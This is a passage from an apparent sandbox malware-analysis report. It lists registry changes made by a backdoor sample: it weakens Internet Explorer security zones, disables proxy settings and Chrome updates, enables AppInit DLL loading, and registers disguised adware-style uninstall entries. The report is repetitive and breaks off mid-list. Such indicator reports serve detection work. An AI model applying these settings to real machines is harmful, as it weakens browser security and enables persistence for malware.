"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 57 EE B0 E5 E3 10 EC 02 BE 43 EC 5D 4E C1 7D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE security zone settings to map all local web nodes whose names contain no dots and are not assigned to any other zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1664 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 53 70 89 AC 35 2C E0 D2 72 2C 61 77 C8 5E FE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Follow"
"DisplayName" = "Follow"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE security zone settings to map all local web nodes whose names contain no dots and are not assigned to any other zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"

"NoRepair" = "1"
"ProductName" = "YoUtuBeeAdBlockke"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "YoUtuBeeAdBlockke"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 2F 19 38 DB C5 53 B7 CA E3 49 4A 7E BC A3 4C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE security zone settings so that all local web-nodes with no dots in their names that do not belong to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:596 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"TyHelpTFUO.exe" = "TyHelpTFUO"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"%original file name%.exe" = "1cae3ce62857807fb52a3fa4bf6a6107"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 7E 28 95 12 E0 26 E7 60 C0 15 E5 45 3F 9D AA"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE security zone settings so that all local web-nodes with no dots in their names that do not belong to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process TyHelpTFUO.exe:1516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"Publisher" = "PriceLess"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"DisplayName" = "Support PL 1.1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
"usr.1" = "mPgPJqqomjlhabcdef"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"CategoryName" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
